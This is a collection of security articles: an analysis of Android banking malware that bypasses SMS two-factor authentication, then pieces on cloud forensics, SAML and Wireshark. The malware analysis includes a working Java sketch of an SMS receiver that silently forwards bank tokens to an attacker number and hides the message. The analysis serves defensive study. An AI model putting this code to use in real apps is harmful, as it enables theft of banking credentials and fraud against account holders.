A basic knowledge of how two factor authentication works
Familiarity with Android/iOS app requirements
What a MITB attack is

However, today this system is hackable by malicious users. Trend Micro said:

The attack is designed to bypass a certain two-factor authentication


scheme used by banks. In particular, it bypasses session tokens, which are
frequently sent to users' mobile devices via Short Message Service (SMS).
Users are expected to enter a session token to activate banking sessions
so they can authenticate their identities. Since this token is sent through a
separate channel, this method is generally considered secure.
This article is a real use case of this kind of malicious software. During our recent analysis of malware targeting Italian financial institutions, we found a very powerful piece of malware that can bypass 2FA with a malicious app installed on the phone. Malware like this can drive the user to download the fake application onto their phone from the official Google Play Store, using a Man in the Browser (MITB) attack. Once on the user's PC, the attacker can take full control of the machine and interact with it through a Command and Control (C&C) server. What we describe in this article is a real, active botnet with at least 40 compromised zombie hosts.

HOW THE 2FA IS BYPASSED

Over the last few days, we have been seeing criminals developing more sophisticated solutions and gaining increasing knowledge of mobile and web programming. This scenario is growing throughout the entire world, though it is concentrated mostly in Europe. Criminals are developing solutions to bypass the 2FA used by around 90% of banks, publishing seemingly legitimate applications in the Google Play Store and Apple App Store. These applications can steal information on the phone, intercept it and send it over the network silently. The latest operation, named Operation Emmental and discovered by Trend Micro, is acting in just this way. In this section, we will discover how a criminal can force a user to download and install the mobile application.
When the malware infects the machine and the user navigates to the online banking platform, a MITB attack starts injecting JavaScript code inside the browser. This injection modifies some data in the page while keeping the same structure. During navigation the hijacked website invites the user to download the fake application, explaining all the steps for entering their data into the bogus form. The app can be downloaded in two different ways:
SMS (by inserting your number in the fake form you will receive an SMS with the download link from the store)
Here is a screenshot of a received SMS. The fake app's name resembles many programs used to encrypt and share sensitive information, so people may trust this app because of its name.

Figure 1. SMS sent by attackers to download the APK

QR CODE

A QR code is shown via the MITB attack during navigation of the online banking website. Here is a screenshot of the image used to redirect the user to the Google Play Store.


Figure 2. QR code used to download the APK

A case involving QR codes is reported by Trend Micro in this image. When the user does not use the SMS or the link inside the web page, a QR code appears. Scanning it with any QR reader from the store, the user will be redirected to the Google Play Store to download the app.

Figure 3.

Every single step is given by the attackers, as reported below:

STEP ONE
When the Google Play Store is opened, click on the install button and accept the app authorization. Rights are requested to send, receive and intercept SMS, and to read/write on the file system.


Figure 4.

Description provided by attackers:








Secure sms transmission with asymmetric encryption, totaly automaticaly.


Totaly secure sms.
Private-key infrastructure (PKI).
Comfortable and easy use, one time installation.
This application is created to protect sensetive data received over sms.
Even if the sms is intersepted nothing can be reached from the encrypted text.
The encrypted text can only be decrypted by your personal private key, generated just after the
first launch.
Each key is unique and has its own identification number.
Functionality:



A Keypair is created after first launch.


A unique identification number is granted.
With the Private Key you decrypt messages, received from the trusted saurses.
Send your Private Key Identifiction Number to the organization which wants to send you an encrypted message. The organization encrypts the message with your Private Key and sends the encrypted message to you. ONLY YOU can decrypt the encrypted Message with your Private Key.

Instruction:



Doqnload and install the app.


Launch the aplication.
Waint till your private kay is generated.
Share your Private Key identification number.

The description is full of orthographic errors, which suggests that the authors are not from an English-speaking country.


Analyzing the APK and decompiling it, we found the permissions requested by the malicious app:
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />

STEP TWO
Once installed, you need to open the app on your phone to see a random number generator. Users need to enter this number into the online banking account to log in to the portal. Trend Micro says:

At this stage, the users have to enter the password that was generated by the fake app. The app has a preset list of possible passwords and just randomly chooses one. The Web page, meanwhile, simply checks if one of those possible passwords was entered. Guessing numbers does not work; the users will not be able to proceed with the fake banking authentication.

Figure 5.

Installing the Android app allows the attackers to gain full control of the user's online banking sessions because, in reality, it intercepts the session tokens sent via SMS to the user's phone, which are then forwarded to the cybercriminals. The spoofed website allows the attackers to obtain the user's login credentials while the mobile app intercepts the real session tokens sent by the bank. As a result, the attackers obtain everything they need to fake the user's online banking transactions.
The app waits for an SMS from the user's bank, which provides an OTP or a legitimate token (.tok). When these are received, the app hijacks the communication in the background and forwards the stolen data to a number via an encrypted SMS.
Here is a decompiled piece of code used to test the availability of the server:
Settings.sendSms(this, new MessageItem("+39366134xxxx", "Hello are you there?"));

Communication starts with a simple SMS requesting service availability. When an SMS is received from a bank number, the interception starts, and an encrypted SMS is sent with the stolen information.
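As an illustration of the interception technique just described, below is a minimal Android/Java sketch of an SMS-intercepting broadcast receiver. The class name, the token check and the forwarding logic are assumptions for illustration, not code recovered from the sample (which additionally encrypts the forwarded message); such a receiver would also need to be registered for the SMS_RECEIVED broadcast in the manifest.

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.telephony.SmsManager;
import android.telephony.SmsMessage;

// Hypothetical sketch of an SMS-stealing receiver; names and checks are illustrative.
public class TokenInterceptor extends BroadcastReceiver {

    // Placeholder destination number, kept masked as in the decompiled sample.
    private static final String ATTACKER_NUMBER = "+39366134xxxx";

    @Override
    public void onReceive(Context context, Intent intent) {
        Object[] pdus = (Object[]) intent.getExtras().get("pdus");
        if (pdus == null) return;
        for (Object pdu : pdus) {
            SmsMessage sms = SmsMessage.createFromPdu((byte[]) pdu);
            String body = sms.getMessageBody();
            // If the message looks like a banking token, forward it silently.
            if (body != null && body.contains(".tok")) {
                SmsManager.getDefault().sendTextMessage(ATTACKER_NUMBER, null, body, null, null);
                abortBroadcast(); // hide the original SMS from the user (ordered broadcast)
            }
        }
    }
}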


C&C CENTER FUNCTION DETAILS

During our code analysis we found a link to a JavaScript file used by the criminals during the injection process in the MITB attack. Going deeper into the obfuscated code, we found a link to a C&C server where the data is sent. Behind the front-end, which was password protected, we saw a custom control panel used to control the botnet. Every single bot is represented in a table and is controlled with the panel. The first screen you can see behind the login panel is a statistics page with the number of compromised hosts.
Figure 6.

In the second one (Logs), there is all the information about the bots. Every single user is cataloged with these parameters:

Used browser
Last operation on that bot
IP
Login
Password
User
Type (file, flash)
PIN
Action (request data login)

As you can see in the panel shown below, in the C&C server the attackers have all that they need to access an online banking website with stolen credentials. This panel is very powerful because it can send a request to the infected user to enter his credentials once again.

Figure 7.


Clicking on the icons on the right, it is possible to send the request to a bot.

Figure 8.

By analyzing every single bot it is possible to see more details about it; this is done by clicking on the PIN.
The third page is the JS page, used by the attacker to inject code inside the bot's browser. To enable the form, there is a hidden command, discovered through analysis of the JavaScript code of that page.

Figure 9.

The fourth section is the Jabber page, where an attacker can change his XMPP username and password, and the last page is dedicated to setting the password for this panel.

Figure 10.

Figure 11.

CONCLUSION

The platform used by these hackers is very powerful because it is not only a drop zone where data is sent, but a real C&C server. The attackers can interact with the malware and send it commands to execute on the infected machine. This kind of methodology is growing every day and the attackers have ever more sophisticated resources: Windows malware, a malicious Android app, a rogue DNS resolver server, a phishing Web server with fake bank site pages, and a compromised C&C server. Banks that use this kind of authentication are exposing users to rogue apps.
Today there are more secure ways to access an online banking portal, like card readers, TANs and multiple-factor authentication, but they are more complicated and slow.
We want to move fast, without any problems or slowdowns.
But is this good for our online bank accounts?

STATISTICS

The attack is still alive and the number of hacked users is increasing every day. We have detected more than 40 hacked hosts and accounts so far.
REFERENCES

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf

ABOUT THE AUTHORS

Davide Cioccia is a Security Consultant at the Reply S.p.A. Communication Valley Security Operations Center in Italy. MSc in Computer Engineering, with a Master's thesis on a new way to combat Advanced Persistent Threats, and a Microsoft Certified Professional (MCP, MS), he has written many articles about financial cybercrime, botnets, drop zones and APTs.
Key assignments include anti-fraud management, anti-phishing services for financial institutions, drop zone and malware analysis, and cyber intelligence platform development.
E-Mail: davide.cioccia@live.it
Twitter: https://twitter.com/david107
LinkedIn: https://www.linkedin.com/in/davidecioccia
Senad Aruch is a multiple-certified ISMS Professional with a 10-year background in: IT Security, IDS and IPS, SIEM, SOC, Network Forensics, Malware Analysis, ISMS and Risk, Ethical Hacking, Vulnerability Management, Anti-Fraud and Cyber Security.
E-Mail: senad.aruc@gmail.com
Blog: www.senadaruc.com
Twitter: https://twitter.com/senadaruch
LinkedIn: https://www.linkedin.com/in/senadaruc


AN OVERVIEW OF
CLOUD FORENSICS
by Dejan Lukan

When discussing cloud forensics, we're actually talking about the intersection between cloud computing and network forensic analysis. Cloud computing basically refers to a network service that we can interact with over the network; this usually means that all the work is done by a server somewhere on the Internet, which might be backed by physical or virtual hardware. In recent years, there has been a significant increase in the use of virtualized environments, which makes it very probable that our cloud service is running somewhere in a virtualized environment.

There are many benefits of virtualized servers, which we won't go into now, but the most prominent ones are definitely low cost, ease of use, and the ability to move them around in seconds without service downtime. Basically, cloud computing is just a fancy term created by marketing people, but we've all been using it for years. A good example of cloud computing is an email service, where we don't have to install an email client on our local computer to access our new email and which serves as storage for all email. Instead, everything is already done by the cloud: the email messages are stored in the cloud and, even if we switch to a different computer, we only need to log in with our web browser and everything is there. Therefore, we only need an interface with which we can access our cloud application, which in the previous example is simply a web browser. Cloud computing has many benefits, but the two most distinct disadvantages are definitely security and privacy. Since we store all data in our cloud somewhere on the Internet, the cloud provider has access to our data, and so does an attacker if a breach occurs in the provider's network.
Network forensic analysis is part of the digital forensics branch, which monitors and analyzes computer network traffic for the purposes of gathering information, collecting legal evidence, or detecting intrusions [1]. When talking about network forensics, we're actually talking about the data that has been transmitted over the network, which might serve as the only evidence of an intrusion or malicious activity. Obviously that's not always the case, since an intruder often leaves evidence on the hard disk of the
compromised host as well in the form of log files, uploaded malicious files, etc. But when the attacker
is very careful not to leave any traces on the compromised computer, the only evidence that we might
have is in the form of captured network traffic. When capturing network traffic, we most often want to
separate the good data from the bad by extracting useful information from the traffic, such as transmitted files, communication messages, credentials, etc. If we have a lot of disk space available, we can
also store all the traffic to disk and analyze it at a later time if needed, but obviously this requires a
great amount of disk space. Usually we use network forensics to discover security attacks being conducted over the network. We can use a tool like tcpdump or Wireshark to perform network analysis on
the network traffic.

CLOUD COMPUTING

Let's talk a little bit about the deployment models of cloud computing, which are described below (summarized after [2]):
Private cloud: The services of a private cloud are used only by a single organization and are not exposed to the public. A private cloud is hosted inside the organization and is behind a firewall, so the organization has full control over who has access to the cloud infrastructure. The virtual machines are then still assigned to a limited number of users.
Public cloud: The services of a public cloud are exposed to the public and can be used by anyone. Usually the cloud provider offers a virtualized server with an assigned IP address to the customer. An example of a public cloud is Amazon Web Services (AWS).
Community cloud: The services of a community cloud are used by several organizations to lower the costs, as compared to a private cloud.
Hybrid cloud: The services of a hybrid cloud can be distributed across multiple cloud types. An example of such a deployment is when sensitive information is kept in private cloud services by an internal application. That application is then connected to an application on a public cloud to extend the application functionality.
Distributed cloud: The services of a distributed cloud are distributed among several machines at different locations but connected to the same network.
The service models of cloud computing are the following (summarized after [2]):
IaaS (infrastructure as a service): provides the entire infrastructure, including physical/virtual machines, firewalls, load balancers, hypervisors, etc. When using IaaS, we're basically outsourcing a complete traditional IT environment: we're renting a complete computer infrastructure that can be used as a service over the Internet.
PaaS (platform as a service): provides a platform such as an operating system, database, web server, etc. We're renting a platform or an operating system from the cloud provider.
SaaS (software as a service): provides access to the service, but we don't have to manage it because that is done by the service provider. When using SaaS, we're basically renting the right to use an application over the Internet.
There are also other service models that we might encounter:
Desktop as a service: We're connecting to a desktop operating system over the Internet, which enables us to use it from anywhere. It's also not affected if our own physical laptop gets stolen, because we can still use it.
Storage as a service: We're using storage that physically exists on the Internet as if it were present locally. This is very often used in cloud computing and is the primary basis of a NAS (network attached storage) system.
Database as a service: Here we're using a database service installed in the cloud as if it were installed locally. One great benefit of using database as a service is that we can use highly configurable and scalable databases with ease.
Information as a service: We can access any data in the cloud by using the defined API as if it were present locally.
Security as a service: This enables the use of security services as if they were implemented locally.
There are other services that exist in the cloud, but we've presented just the most widespread ones that are used on a daily basis.

If we want to start using the cloud, we need to determine which service model we want to use. The decision largely depends on what we want to deploy to the cloud. If we would like to deploy a simple web application, we might want to choose a SaaS solution, where everything will be managed by the service provider and we only have to worry about writing the application code. An example of this is writing an application that can run on Heroku.
We can think of the service models in terms of layers, where IaaS is the bottom layer, which gives us the most access to customize most of the needed infrastructure. PaaS is the middle layer, which automates certain things, but is less configurable. The top layer is SaaS, which offers the least configuration, but automates a large part of the infrastructure that we need when deploying an application.

CLOUD NETWORK FORENSICS

The first thing that we need to talk about is defining why cloud network forensics is even necessary. The answer to that is rather simple: because of attackers trying to hack our cloud services. We need to be notified when hackers are trying to gain access to our cloud infrastructure, platform, or service. Let's look at an example. Let's imagine that company X is running a service Y in the cloud; the service is very important and has to be available 24/7. If the service is down for a few hours, it could mean a considerable financial loss for X's site. When such an attack occurs, company X must hire a cloud forensics expert to analyze the available information. The forensic analyst must look through all the logs on the compromised service to look for forensic evidence. The forensic analyst soon discovers that the attack was conducted from the cloud provider's network, so he asks the cloud provider to give him the logs that he needs.
At this point, we must evaluate what logs the forensic investigator needs in order to find out who was behind the attack. This is where cloud network forensics comes into play. Basically, we need to take the digital forensics process and apply it to the cloud, where we need to analyze the information we have about filesystems, processes, registry, network traffic, etc. When collecting the information that we can analyze, we must know which service model is in use, because collecting the right information depends on it.
When using different service models, we can access different types of information, as shown in the table below [3,4]. If we need additional information about the service model we're using that is not specified in the table below, we need to contact the cloud service provider and they can send us the required information. The first column of the table contains the different layers that we might have access to when using cloud services. The SaaS, PaaS and IaaS columns show the access rights we have when using the various service models, and the last column presents the information we have available when using a local computer that we have physical access to.
Information      SaaS    PaaS    IaaS    Local
Networking       -       -       -       X
Storage          -       -       -       X
Servers          -       -       -       X
Virtualization   -       -       -       X
OS               -       -       X       X
Middleware       -       -       X       X
Runtime          -       -       X       X
Data             -       X       X       X
Application      -       X       X       X
Access Control   X       X       X       X

(An X marks the layers we can access ourselves; for the rest, the information must be requested from the cloud service provider.)

It's evident from the table that, when using a local computer, we have maximum access, which is why the analysis of a local machine is the most complete. I intentionally didn't use the term easiest, because that's not true: when we have maximum access to the computer, there are multiple pieces of evidence that we can collect and analyze. The problem with cloud services is that the evidence needs to be provided by the CSP (cloud service provider): if we want to get application logs, database logs, or network logs
when using the SaaS service model, we need to contact the service provider in order to get them, because we can't access them by ourselves. Another problem is that the user's data is kept together with the data of other users on the same storage system, so it's hard to separate just the data that we need to conduct an analysis. If two users are using the same web server for hosting a web page, how can we prove that the server's log contains the data of the user that we're after? This is quite a problem when doing a forensic analysis of a cloud service.
Let's describe every entry from the table above, so it will make more sense.
Networking: In a local environment, we have access to the network machines, such as switches, routers, IDS/IPS systems, etc. We can access all of the traffic passing through the network and analyze it as part of gathering as much data as we possibly can. When using the cloud, even the CSP doesn't have that kind of data, because it mustn't log all the traffic passing through the network: users' data is confidential and the CSP can't record, store, and analyze it. The CSP might only apply an IDS/IPS solution to the network, which only analyzes traffic for malicious behavior and alerts the provider of such activity.
Storage: When we have hardware access to the machine, we know exactly where the data is located but, when using a cloud service, the data could be anywhere, even in different states, countries, or even continents.
Servers: In a traditional system, we have physical access to the machine, which is why we can actually go to the machine and analyze the data on it; all the data is local to the machine. This isn't possible when using the cloud, because the data is dispersed through multiple data centers and it's hard to confirm that we've actually collected all the needed data.
Virtualization: In a local environment, we have access to the virtualization environment, where we can access the hypervisor, manage existing virtual machines, delete a virtual machine, or create a new virtual machine. In the public cloud, we normally don't have access to the hypervisor, but if we absolutely must have access, we can run a private cloud.
OS: In a local environment, we have complete access to the operating system, as we do in the IaaS model, but not in the PaaS and SaaS models. If we want access to the operating system, we could connect to the SSH service running on the server and issue OS commands, which we can't do when using Heroku, for example.
Middleware: The middleware connects two separate endpoints, which together form a whole application. For example, we might have a database running on a backend system and the web application connects to that database by using different techniques.
Runtime: When using the IaaS model, we can influence how the application is started and stopped, so we have access to its runtime.
Data/application: In the PaaS and IaaS models, we have access to all of the data and applications, which we can manage by using search, delete, add, etc. We can't do that directly when using the SaaS model.
Access control: In all service models, we have access to the access control because, without it, we wouldn't have been able to access the service. We can control how access is granted to different users of the application.
When conducting a forensic analysis in the traditional way, we can simply hire a forensics expert to collect all the data from the local machine and analyze it. In a cloud service, we can do the same, but we must also cooperate with the cloud service provider, which might not have forensics experts available or simply might not care and therefore won't provide us with all the data that we need.

CONCLUSION

In this article, we've seen that, when conducting a cloud network forensic analysis, we do not have access to the same information as we do when conducting an analysis of a normal local computer system. We often do not have access to the information that we're after and must ask the cloud service provider to furnish the information we need. The problem with such data is that we must trust the cloud service provider to give us the right information; they might give us false information or hold back some very important information. This is just another problem when trying to use the data in court, because we must prove beyond doubt that the evidence from the collected data belongs to the user; the process of collecting the data, preserving it, and analyzing it must be documented and acceptable in a court of law.


When an attack has occurred on a cloud service, there are a lot of different problems we need to address, but the most important of them is communication with our cloud service provider. Because the
services are located in the cloud, there is a lot of information that could serve as evidence which can only
be provided by the CSP, since only the cloud provider has access to it. Therefore, there are also other
problems with gathering the data when working with cloud environments, such as data being located in
multiple data centers located around the globe, data of different users being located in the same storage
device, etc.
There is still a lot of research that must be done in order to improve the forensic examination of cloud services. There is also a lack of professional cloud forensic experts, whose numbers are expected to increase in the next couple of years.
REFERENCES

[1] Gary Palmer, A Road Map for Digital Forensic Research, Report from DFRWS 2001, First Digital Forensic Research Workshop, Utica, New York, August 7-8, 2001, pp. 27-30.
[2] Cloud computing, Wikipedia, https://en.wikipedia.org/wiki/Cloud_computing.
[3] Digital Forensics in the Cloud, Shams Zawoad, University of Alabama at Birmingham, Ragib Hasan, University of Alabama at Birmingham.
[4] Pentest Magazine, Vol.1, No.4, Issue 04/2011(04) August, Aaron Bryson, Great Pen Test Coverage: Too Close For Missiles, Switching
to Bullets.

ABOUT THE AUTHOR

Dejan Lukan is a security researcher for InfoSec Institute and a penetration tester from Slovenia. He is very interested in finding new bugs in real-world software products with source code analysis, fuzzing and reverse engineering. He also has a great passion for developing his own simple scripts for security-related problems and learning about new hacking techniques. He knows a great deal about programming languages, as he can write in a couple of dozen of them.


AUTHENTICATING
REMOTE ACCESS FOR
GREATER CLOUD
SECURITY
by David Hald, co-founder, chief relation officer

The nature and pace of business have changed as technology has opened new possibilities for organizations. One of these possibilities is cloud services, which benefit companies by enabling remote access to data stored offsite. Its convenience has made cloud services incredibly popular, both to businesses and to malicious actors. With so much data at stake, the rise in the use of remote access necessitates ironclad security. Authenticating the identities of users remotely accessing these resources has never been more critical.

According to Javelin Strategy & Research's 2014 Identity Fraud Study, a new identity fraud victim was hit every two seconds in America last year, an increase of over half a million people since 2012.
Despite the rise in identity and data theft, many authentication methods still rely on usernames and passwords to protect employees, customers and data. Today's cybercriminals are increasingly sophisticated in their attacks, and yesterday's authentication methods are simply inadequate.

SECURITY NEEDS HAVE CHANGED

Organizations are granting access to cloud-based business solutions such as Microsoft Office 365, Salesforce and Google Apps to an increasing number of end-users. Some cloud solutions offer generic security measures for authenticating users who access these systems in the cloud. This approach gives the end-user the responsibility of choosing what type of security to use and forces the user to rely on personal judgment to determine whether the security is strong enough to protect access effectively.

It has become increasingly obvious that usernames and passwords are ineffective ways of authenticating access, yet their use is still widespread as users balk at more cumbersome forms of authentication
like tokens and certificates. While simple user names and passwords are no longer effective, the amount
of data stored in the cloud continues to escalate. Cloud providers must accommodate access to millions
of users from all over the world. A centralized breach in a cloud-based solution would pose a serious risk
to the data of thousands of organizations, if not more. Therefore, end-users should select cloud providers that offer strong, flexible security that is extremely hard to compromise yet easy to use.

A CENTRALIZED SECURITY APPROACH

In light of the increasing need for stronger security for cloud access, businesses have begun to implement
standards for authenticating users. One of the major problems organizations face is how to manage user
identities in the cloud. To manage cloud identities, IT departments must often maintain an additional set of
user credentials for each and every cloud solution used by their employees. This approach requires cumbersome procedures and extra work for IT. To bypass this problem, IT should use a centralized method that
gives each user a single identity that provides access to a variety of different cloud solutions.
A centralized method like this ensures that those who access an organization's assets have been prequalified. It provides strong authentication while also freeing end-users from being dependent on specific
software, hardware or features for greater flexibility and convenience.

SAVING TIME WITH SAML

With the ability to allow secure Web domains to exchange user authentication and authorization data,
Security Assertion Markup Language, or SAML, is one way to provide effective and easy identity management in the cloud. A SAML setup requires three roles: the end-user, the service provider and the identity provider. The service provider role is held by cloud solutions, such as Microsoft Office 365, Salesforce
or Google Apps. The identity provider role handles user authentication and identity management for the
service provider, and can be used as a centralized system to handle authentication and identity management for multiple service providers at once. By using a SAML identity provider, organizations can gain all
the recognized benefits that are traditionally associated with on-premise authentication solutions.
SAML frees organizations from having to maintain multiple instances of user credentials: one in the local area network (LAN) and several in the cloud. In this way, the organization can keep its authentication and security mechanisms the same for all users, regardless of whether they are accessing data in the cloud or on the LAN, thus saving time and money while boosting security.

MAKE SECURE AUTHENTICATION YOUR GOAL

Cloud services offer convenient remote access to organizations, but they can also open the door for
identity theft if the cloud security system relies on outdated methods such as usernames and passwords.
The threat is real, and growing, so organizations must scrutinize the security that a cloud provider offers
before closing a deal, and make secure, authenticated cloud access for end-users their goal regardless of whether it's offered by the cloud provider. For their part, cloud providers must make it their goal to create a secure and easy-to-use authentication method. The stakes are too high not to.
ABOUT THE AUTHOR

David Hald is a founding member of SMS PASSCODE A/S, where he acts as a liaison and a promoter of the
award-winning SMS PASSCODE multi-factor authentication solutions. Prior to founding SMS PASSCODE
A/S, he was a co-founder and CEO of Conecto A/S, a leading consulting company within the area of mobile- and security solutions with special emphasis on Citrix, Blackberry and other advanced mobile solutions.
In Conecto A/S, David has worked on strategic and tactical implementation in many large IT projects. David has also been CTO in companies funded by Teknologisk Innovation and Vækstfonden. Prior to founding
Conecto, he has worked as a software developer and project manager, and has headed up his own software
consulting company. David has a technical background from the Computer Science Institute of Copenhagen
University (DIKU).


PACKET ANALYSIS
WITH WIRESHARK AND
PCAP ANALYSIS TOOLS
by Eric A. Vanderburg

Almost every computer today is connected. Their communication with others takes the form of packets, which can be analyzed to determine the facts of a case. Packet sniffers are also called network analyzers, as they help in monitoring every activity that is performed over the Internet. The information from packet sniffing can be used to analyze the data packets and uncover the source of problems in the network. The important feature of packet sniffing is that it captures data that travels through the network, irrespective of the destination. A log file will be generated at the end of every operation performed by the packet sniffer, and the log file will contain the information related to the packets.

Every packet has a header and a body, where the header contains information about the source of the packet and the body contains the actual information about the transfer. There are packet sniffer tools available online; many of them are open source tools and hence available free of cost. How, when and where should this be performed to collect the best data in a defensible manner? Attend this workshop to find out.

WHAT IS PACKET ANALYSIS?

Investigations cannot always be contained to a single computer, especially with the way systems are connected these days. Right now, your computer may be connected to dozens of different computers, some to check for software updates, others to gather tweets, email, or RSS feeds. Some connections could be used to authenticate to a domain or access network resources. Now consider an investigation and the potential importance this information could have to it.


Network communication over an Internet Protocol (IP) network can best be understood as a set of
packets that form a communication stream. A machine may send and receive thousands of packets per
minute and computer networks are used to send these packets to their destination. Packet capture tools
can be used to analyze this communication to determine how a computer or user interacted with other
devices on the network. Packet analysis can capture these packets so that they can be reviewed to determine what communication took place.
Packet analysis is also called packet sniffing or protocol analysis. A tool that is used for packet analysis is called a packet sniffer or packet capture tool. It captures raw data across the wire, which helps in analyzing which parties are communicating on the network, what data is flowing, how much data is being transmitted and what network services are in use.

PACKET SNIFFING PROCESS

Packet sniffing can be divided into three steps. The first step is collection when the software gathers all
data traversing the network card it is bound to. Next, the data is converted to a form that the program can
read and lastly, the program presents the data to be analyzed and can perform pre-programmed analysis techniques on the data.

OSI NETWORK MODEL

Before you can analyze packets, you need to understand how network communication takes place. The OSI network model is a conceptual framework that describes the activities performed to communicate on a network.

TOOLS

There are various packet sniffing tools available on the market. Some popular packet capture tools include Wireshark, Network Miner and NetWitness Investigator, which we will see in detail. All three of these tools are free to download and use, and they can be operated in both command line format and GUI format.
Of the three, Wireshark is the most popular packet sniffer tool, used worldwide for its ease of installation, ease of use, etc. More importantly, it is an open source tool that is available free of cost. The tool also provides advanced options that enable a forensic investigator or network administrator to delve deep into the packets and capture information. It supports numerous operating systems, protocols and media types.
There are numerous packet sniffer tools available for network administrators to analyze and understand the traffic flow across the network. It is always difficult to zero in on the best of the lot, as almost all of them perform the required functions seamlessly. Still, there are factors on which they can be ranked and classified as the top packet sniffing tools. The following three tools are identified as among the best on the market, already protecting millions of computers by identifying serious threats. Let's get into detail with each of the three packet sniffing tools and understand why they are ranked in this order.

WIRESHARK

Wireshark is a popular open source packet sniffer that performs functions such as network troubleshooting, data analysis, protocol development, etc. The tool uses the latest available platforms and user interface toolkits. The development version of Wireshark uses Qt, while the current releases use the GTK+ toolkit. The major advantage of using Wireshark is that it supports multiple platforms, operating systems and protocols. Wireshark comes in both a graphical user interface format and a command-line format. Wireshark uses the network interface controller's promiscuous mode so that all the traffic flowing across the network can be captured; otherwise, only the data addressed to the capturing host would be captured.
Wireshark supports various protocols and media types. The approximate number of protocols supported by Wireshark is more than 900, and this count keeps increasing as updates are released. The primary reason for the increase in the count of supported protocols is the open source nature of the tool. A developer has the freedom to write code for including a new protocol in Wireshark. The Wireshark development team reviews the code that you send and includes it in the tool. This makes it possible for a new protocol to be supported by Wireshark. Also, Wireshark supports major operating systems, ranging from Windows and Mac to Linux-based operating systems.

The other major reason for Wireshark to remain at the top of a user's list of best packet sniffers is its ease of use. The graphical user interface of the tool is one of the simplest and easiest available. The menus are clear with a simple layout, and raw data is represented graphically. This makes it easier for novices to get along with the tool in the early stages of their career. The common problem that users face when using open source software is a lack of proper program support. Wireshark has a highly active user community that can be ranked as the best among open source projects. The development team also provides an email subscription that keeps users informed of the latest updates and FAQs.
Wireshark is very easy to install, and the required system configuration is minimal as well. Wireshark requires a minimum of a 400 MHz processor and 60 MB of free storage. The system should have the WinPcap capture driver and a network interface card that supports promiscuous mode, and this requires the user to have administrator access on the system being used.
Once you are sure that your system has the given configuration, you can install the tool in a very short time. Since there will be no data the first time you open Wireshark, it will not be easy to judge the user interface until a capture has been started.
Installing the Wireshark tool is as simple as installing other software on a Windows system. All you need to do is double click the executable file for the installer to open up. Agree to the terms and conditions and select the components you need to be installed along with the packet sniffing tool. Certain components are selected by default, and they are enough for basic operations. Ensure that you select the Install WinPcap option and verify that the WinPcap installation window is displayed some time after the main Wireshark installation has started. When the installation is complete, open the tool, select the Capture button from the main menu and select the interfaces from which you need data to be captured. This will initiate your first data capture using Wireshark, and the main window will then be filled with data that can be used by the user.

Figure 1. Home Window of Wireshark


Figure 2. Selecting Interfaces

The main window of Wireshark is where the collected data is presented to the forensic investigator or network administrator. Hence, this is the place where most of the time in the tool will be spent. The main window is broken down into three panes that are interlinked with each other.
The three panes are the packet list pane, the packet details pane and the packet bytes pane. The packet list displays the packets that are available for analysis. On selecting a packet, the corresponding packet details are displayed in the packet details pane and the corresponding bytes of the packet are displayed in the packet bytes pane. The packet list pane displays the packet number and the time at which the packet was captured by the tool. It also displays the source and destination of the packet and other information related to the packet, such as the packet protocol. The packet bytes pane displays the raw data in the same form as it was originally captured. More information about Wireshark can be found at https://www.wireshark.org/. The tool can also be downloaded from the site.

Figure 3. Main Window

NETWORK MINER

Network Miner is a packet analysis tool that also includes the ability to perform packet sniffing. It is available for Windows, Linux and Mac OS. It is a passive packet capturing tool that detects operating systems, traffic, and network ports. In contrast, Wireshark is an active packet capturing tool.

The difference between an active and a passive packet sniffing tool is that in active sniffing, the sniffing tool sends requests over the network and uses the responses to capture packets, while passive sniffing does not send requests to receive a response. It simply scans the traffic without getting noticed on the network.
The places where passive sniffing comes in handy are radar systems, telecommunication and medical equipment, and many others. Another difference between the active and passive sniffing techniques is that the latter uses a host-centric approach, which means it uses hosts for sorting out data, while active sniffing uses packets. Similar to Wireshark, Network Miner also comes with an easy-to-use interface and simple installation.

NETWITNESS INVESTIGATOR

NetWitness Investigator is a packet sniffing tool that is the result of 10 years of research and development and has been used in the most complex threat environments. NetWitness Investigator had long been used only in critical environments, but the company has released a free version of the software, making it available to the public as well. The Investigator captures live packets from both wireless and wired network interfaces. It supports most major packet capture systems. The free version of the tool allows 25 simultaneous users to capture data up to a maximum of 1 GB.
The tool has other interesting features, such as effectively analyzing the data at different networking layers, from users' email addresses and files, IPv6 support, full content searching, exporting the collected information in PCAP format, and others. As the number of users on the Internet has grown over the years, it was important for the Internet Engineering Task Force to come up with unique IP addresses that can be used for new devices. IPv6 will replace the current generation IPv4 protocol. The introduction of IPv6 allows an increased number of IP addresses, which helps more users to communicate over the Internet. This is because IPv4 addresses are only 32 bits long, which supports about 4.3 billion addresses, whereas IPv6 addresses are 128 bits long and support a vastly larger address space. With a new set of protocols used for communication, it is important for forensic tools to provide support for those protocols for seamless operation. NetWitness Investigator thus provides support for IPv6, which will be the future of all Internet communication. Every new release of the tool comes with many new features that may not be available in other packet sniffing tools. NetWitness Investigator requires a certain minimum configuration for installation. The tool can be installed on a Windows operating system with at least 1 GB of RAM, one Ethernet port, a large amount of data storage, etc. The free version of the tool supports only the Windows operating system, while the commercial version provides support for Linux as well. One important feature of the Investigator is that it does not alert the forensic investigator or network administrator to problems in the network based only on known threats. Instead, it catches packets in real time, analyzes the network for differences in behavior and reports them to the forensic investigator or network administrator immediately. The commercial version of the software brings in more benefits when compared to the free version. Some of the features that are present only in the enterprise version are support for the Linux platform, remote network monitoring, informer, decoder and an automated reporting engine.

HOW PACKET ANALYZERS WORK

Packet analyzers intercept network traffic that travels through the wired and wireless network interfaces that they have access to. The structure of the network, along with how network switches and other devices are configured, decides what information can be captured. In a switched wired network, the sniffer can capture data only from the switch port it is attached to, unless port mirroring is implemented on the switch.
However, with wireless, the packet sniffing tool can capture data from only one channel, unless there are multiple interfaces that allow data to be captured from more than one channel. RFC 5474 is a framework that is used for the selection of packets and reporting on them. It uses the PSAMP framework, which selects packets using statistical methods and exports them to collectors. RFC 5475 describes the various techniques of packet selection that are supported by PSAMP. These frameworks help users perform the processes seamlessly.
